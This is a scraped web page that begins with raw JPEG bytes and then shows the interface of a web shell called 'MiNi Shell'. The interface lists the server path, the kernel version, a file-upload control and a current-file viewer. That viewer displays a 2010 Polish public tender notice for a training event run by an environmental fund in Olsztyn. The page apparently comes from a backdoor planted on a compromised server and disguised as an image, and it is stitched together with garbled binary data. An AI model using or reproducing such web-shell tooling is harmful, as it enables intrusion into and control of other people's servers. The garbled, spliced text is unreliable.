JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101112/367110-N-2010.html

<p class="kh_header"><b>Olsztyn: Organizacja, przeprowadzenie i kompleksowa obsługa szkolenia dla beneficjentów 
i potencjalnych beneficjentów Priorytetu I i II Programu Operacyjnego Infrastruktura 
i Środowisko</b><br>
<b>Numer ogłoszenia: 367110 - 2010; data zamieszczenia: 12.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Fundusz Ochrony Środowiska i Gospodarki Wodnej w Olsztynie , ul. Świętej Barbary 9, 10-026 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5220201, faks 089 5220209.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wfosigw.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja, przeprowadzenie i kompleksowa obsługa szkolenia dla beneficjentów 
i potencjalnych beneficjentów Priorytetu I i II Programu Operacyjnego Infrastruktura 
i Środowisko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja, przeprowadzenie i kompleksowa obsługa szkolenia 
dla beneficjentów i potencjalnych beneficjentów Priorytetu I i II Programu Operacyjnego Infrastruktura i Środowisko.

I Uwarunkowania ogólne dotyczące przeprowadzenia szkolenia

1. Temat szkolenia:
Korygowanie wydatków nieprawidłowo poniesionych oraz weryfikacja wniosków o płatność 
w ramach priorytetu I i II POIiŚ
Program szkolenia
Blok A
Korygowanie wydatków nieprawidłowo poniesionych w ramach POIiŚ:
Zasady kwalifikowania wydatków w ramach POIiŚ (omówienie i przykłady praktyczne - szczególnie w kategoriach: roboty budowlane, sprzęt i wyposażenie, przygotowanie 
i zarządzanie projektem)
Kwalifikowalność podatku VAT
Wyjaśnienie pojęcia korekt finansowych, sytuacji w których mogą wystąpić;
Omówienie zasad dokonywania korekt zgodnie z zapisami Zaleceń w zakresie   korygowania wydatków;
Studium przypadku korygowania wniosku o płatność w odniesieniu do nieprawidłowości wykrytej przed zatwierdzeniem wniosku o płatność (tj. przed rozliczeniem wydatku);
Studium przypadku korygowania wniosku o płatność w odniesieniu do nieprawidłowości wykrytej po rozliczeniu wydatku beneficjentowi;
 Korygowanie wydatków w przypadku wykrycia nieprawidłowości przed i po rozliczeniu zaliczki z uwzględnieniem naliczania odsetek i dokonywania zwrotów.
Blok B 
 Specyfika wniosku o płatność:
Sporządzanie wniosku o płatność w ramach POIiŚ - wykonawca jest zobowiązany do zgromadzenia zagadnień problemowych dotyczących wniosku o płatność. Zagadnienia powinny być zgłoszone przez uczestników szkolenia (lista beneficjentów POIiŚ dostępna w WFOŚiGW w Olsztynie);
Weryfikacja wniosku o płatność w ramach POIiŚ - na co należy zwrócić uwagę - najczęściej popełniane błędy przy wypełnianiu wniosków o płatność zidentyfikowane przez IW podczas weryfikacji (lista błędów dostępna w WFOŚiGW w Olsztynie);
Terminy składania wniosku o płatność;
Płatności i rozliczenia  w formie zaliczek (m.in. terminy rozliczania zaliczki, odsetki, płatności z wydzielonego rachunku zaliczkowego) odniesienie się do: umowy o dofinansowanie, ustawy o finansach publicznych, ustawy o dochodach jst, Rozporządzenia MRR z dnia 18.12.2009 r. w sprawie warunków i trybu udzielania i rozliczania zaliczek, Zaleceń w zakresie systemu obiegu środków finansowych w ramach POIiŚ oraz Zaleceń w zakresie wzoru wniosku beneficjenta o płatność w ramach POIiŚ;
Deklarowanie ponownie tych samych wydatków (omówienie zasad ich ujmowania 
w kolejnych wnioskach o płatność);
Omówienie listy obowiązkowych dokumentów załączanych do wniosku 
o płatność;
Przyjęcie środka trwałego oraz rozliczanie amortyzacji;
Podsumowanie, najlepsze praktyki, rady praktyczne do formy składania wniosku o płatność

Prosimy o przygotowanie propozycji agendy szkolenia (minimum dwie) z uwzględnieniem podanego wyżej zakresu. Program realizacji szkolenia będzie podlegał zatwierdzeniu przez Zamawiającego na maksymalnie 5 dni po podpisaniu umowy. Szkolenie powinno być prowadzone z wykorzystaniem następującej metodyki: wykład, warsztaty przeplatane dyskusją oraz sesje pytań i odpowiedzi. Prezentacja przeznaczona dla uczestników musi być przygotowana w wersji kolorowej zgodnie 
z Księgą Identyfikacji Wizualnej Narodowej Strategii Spójności oraz z zasadami informacji i promocji dla Programu Operacyjnego Infrastruktura i Środowisko.

2. Termin:
13 - 14 grudnia 2010 r.

3. Czas trwania zajęć:
Szkolenie powinno być przeprowadzone w wymiarze 16 h zegarowych po 8 h dziennie. W czas szkolenia wliczone są cztery przerwy kawowe po 15 min oraz dwie przerwy obiadowe trwające 
po 1 h. 

4. Liczba uczestników szkolenia:
W szkoleniu uczestniczyć będzie 45 beneficjentów i potencjalnych beneficjentów. Ostateczną liczbę uczestników Zamawiający przekaże na 3 dni kalendarzowe przed terminem szkolenia 
z zastrzeżeniem jej zmiany o +,- 5 osób do dnia szkolenia do godziny 10:00. 

5. Lokalizacja szkolenia: 
Hotel lub ośrodek wypoczynkowy w województwie warmińsko - mazurskim o standardzie odpowiadającym, co najmniej trzem gwiazdkom w odległości do 55 km od Olsztyna. 
Hotel powinien posiadać od 100 do 150 miejsc noclegowych. W hotelu powinno być minimum 
50 pokoi wyposażonych w TV i telefon oraz łazienki. 

II Zadania Wykonawcy
Do zadań Wykonawcy należy organizacja, przeprowadzenie i obsługa szkolenia, o którym mowa 
w części I, zgodnie z poniższymi uwarunkowaniami:

1.	Zapewnienie sali wykładowej:
Sala szkoleniowa powinna być przeznaczona na minimum 60 osób i musi spełniać poniższe standardy szkoleniowe, tj. posiadać:
- łatwy dostęp do zaplecza sanitarnego
- klimatyzację
- odpowiednie oświetlenie i nagłośnienie 
- sprzęt multimedialny
- miejsca siedzące, biurka lub stoły dla uczestników
- sala szkoleniowa tylko do dyspozycji uczestników szkolenia
- stół na rzutnik i laptop trenera
- ekran do wyświetlania prezentacji 
- flipchart i mazaki
- dwa mikrofony bezprzewodowe
- możliwość ustawienia stołów w kształcie litery -u-
- oznakowanie Sali wykładowej zgodnie z Księgą Identyfikacji Wizualnej Narodowej Strategii Spójności oraz z zasadami informacji i promocji dla Programu Operacyjnego Infrastruktura 
i Środowisko. Powinna być również zamieszczona informacja nt. współfinansowania szkolenia przez Unię Europejską ze Środków Funduszu Spójności w ramach Pomocy Technicznej Programu Operacyjnego Infrastruktura i Środowisko.

2.	Zapewnienie zajęć szkoleniowych, w tym trenera:
Ekspert - praktyk, powinien minimum od 10 lat zajmować się funduszami pomocowymi, sporządzaniem analiz finansowych i ekonomicznych. Trener powinien znać proces wdrażania POIiŚ  (nabór i ocen wniosków, płatności dla beneficjentów, sprawozdawczości i monitoring, kontrola, ustalanie i raportowanie nieprawidłowości). Trener powinien współuczestniczyć w opracowaniu dokumentów programowych i aplikacyjnych dla beneficjentów programu operacyjnego (w tym studium wykonalności, kwalifikowalności wydatków, przygotowania i realizacji wydatków)  a także 
w ocenie projektów i podejmowaniu decyzji o przyznaniu dofinansowania (w tym ocena projektów pod kątem wykonalności projektów). 
Trener powinien posiadać doświadczenie w konsultingu w zakresie funduszy europejskich. Powinien prowadzić szkolenia z zakresu przygotowania i realizacji projektów współfinansowanych ze źródeł zewnętrznych oraz analizy finansowej i ekonomicznej. 
 
3.	Zapewnienie materiałów szkoleniowych:
W ramach umowy należy przygotować materiały szkoleniowe o treści adekwatnej do omawianej tematyki przygotowane w formie papierowej i na płycie CD dla każdego uczestnika i dodatkowo dwa egzemplarze do archiwum. Wykonawca na maksymalnie 5 dni kalendarzowych przed terminem szkolenia musi uzyskać akceptację Zamawiającego w zakresie materiałów szkoleniowych. Materiały w formie drukowanej (wydruk materiałów w kolorze) muszą być trwale połączone ze sobą (np. bindowane, zszyte, oprawione itp.). Wraz z materiałami szkoleniowymi Wykonawca przekazuje wszystkim uczestnikom materiały piśmiennicze - notatnik, długopis i zakreślacz. Po zakończeniu szkolenia każdy uczestnik powinien dostać certyfikat-zaświadczenie ze szkolenia. Certyfikat-zaświadczenie-materiały szkoleniowe muszą być oznakowany,e zgodnie z zasadami promocji POIiŚ oraz Księgą Identyfikacji Wizualnej NSS. Na materiałach szkoleniowych powinna być zamieszczona informacja o współfinansowaniu materiały szkoleniowe współfinansowanie przez Unię Europejską ze Środków Funduszu Spójności w ramach Pomocy Technicznej Programu Operacyjnego Infrastruktura i Środowisko. Wykonawca na maksymalnie 5 dni kalendarzowych przed terminem szkolenia musi uzyskać akceptację Zamawiającego w zakresie wzoru certyfikatu. Dodatkowo certyfikaty-zaświadczenia muszą posiadać podpisy i pieczątki Wykonawcy. Wykonawca powinien zapewnić zestawienie zaświadczeń w wersji papierowej i elektronicznej. 
4.	Zapewnienie usługi gastronomicznej:
Wykonawca zapewni serwis gastronomiczny, tj. przygotowanie pomieszczenia, sprzątanie, obsługa kelnerska, zastawa ceramiczna. Posiłki muszą być przygotowywane na miejscu. Wykonawca zapewni dla wszystkich uczestników szkolenia: 
- dwa serwowane obiady składające się z przystawek, zupy, drugiego dania z zestawem surówek, deseru i soków owocowych, wody mineralnej gazowanej i niegazowanej oraz herbaty.
- serwowaną kolację pierwszego dnia szkolenia składającą się z: przystawki, ciepłego dania głównego, deseru, soków owocowych, wody mineralnej gazowanej i niegazowanej oraz herbaty. Podczas dwóch dni szkolenia powinien być prowadzony całodzienny serwis kawowy od godz. 9:30 w pierwszym dniu szkolenia. Serwis kawowy powinien składać się minimum z: kawy, herbaty 
(co najmniej 3 rodzaje herbat w torebkach), wody mineralnej gazowanej i niegazowanej, soków owocowych, cytryny, śmietanki, cukru, trzech rodzajów kruchych ciastek, kanapek konferencyjnych.  

5.	Zapewnienie usługi noclegowej:
Wykonawca zobowiązuje się do zapewnienia uczestnikom szkolenia możliwości skorzystania 
z noclegów w hotelu w pokojach jednoosobowych oraz dwuosobowych z pełnym węzłem sanitarnym,  TV oraz telefonem. Część pokoi hotelowych powinna być przystosowana dla potrzeb osób niepełnosprawnych. Nocleg wraz ze śniadaniem. Wykonawca zapewni koordynację rezerwacji noclegów. Uczestnicy będą zakwaterowani zgodnie z kartami zgłoszeniowymi przesłanymi wcześniej do Zleceniodawcy. Uczestnicy pokrywają w zakresie własnym koszt noclegu oraz dojazdu do miejsca szkolenia. Na życzenie poszczególnych uczestników, Wykonawca zobowiązany jest zapewnić im nocleg w noc poprzedzającą szkolenie. Lista osób korzystających z dodatkowego noclegu zostanie przekazana przez Zamawiającego na 3 dni kalendarzowe przed terminem szkolenia. Koszty dodatkowych noclegów ponosić będą uczestnicy. Ponadto, Wykonawca zapewni bezpłatne miejsca parkingowe dla wszystkich uczestników szkolenia, w odległości nie większej, niż 100 m od miejsca zakwaterowania.

6.	Inne:
- zapewnienie osoby do obsługi technicznej podczas trwania całego szkolenia (przygotowanie, oznakowanie sali, ustawienie stołów w kształt litery -u- i krzeseł w na sali wykładowej, rozdanie uczestnikom szkolenia materiałów szkoleniowych, piśmienniczych oraz płyt CD, kontakt 
z przedstawicielem hotelu w celach organizacyjnych);
- zapewnienie miejsca do rejestracji uczestników szkolenia: Wykonawca zapewni recepcję wyposażoną w stół oraz krzesło, gdzie uczestnicy będą podpisywali listy obecności;
- oznakowanie miejsca szkolenia, w celu ułatwienia dotarcia uczestnikom do sali wykładowej;
- przeprowadzenie i przygotowanie na koniec szkolenia anonimowej ankiety oceny szkolenia oraz sporządzenie na ich podstawie raportu ze szkolenia oraz przekazanie Zamawiającemu (wraz 
z odpowiednim oznaczeniem zgodnym z Księgą Identyfikacji Wizualnej Narodowej Strategii Spójności);
- Wykonawca po realizacji szkolenia wystawi jedną fakturę VAT w kwocie brutto, obejmującą wszystkie poniesione koszty;
- Zamawiający przygotowuje listę uczestników szkolenia;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 13.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonego oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zmiana terminu szkolenia ze względu na brak możliwości rezerwacji odpowiedniej ilości miejsc hotelowych;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wfosigw.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Fundusz Ochrony Środowiska i Gospodarki Wodnej w Olsztynie
ul. Św. Barbary 9
10-026 Olsztyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2010 godzina 14:30, miejsce: Wojewódzki Fundusz Ochrony Środowiska i Gospodarki Wodnej w Olsztynie
ul. Św. Barbary 9
10-026 Olsztyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest finansowane przez Unię Europejską ze środków Funduszu Spójności w ramach Pomocy Technicznej programu Operacyjnego Infrastruktura i Środowisko.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com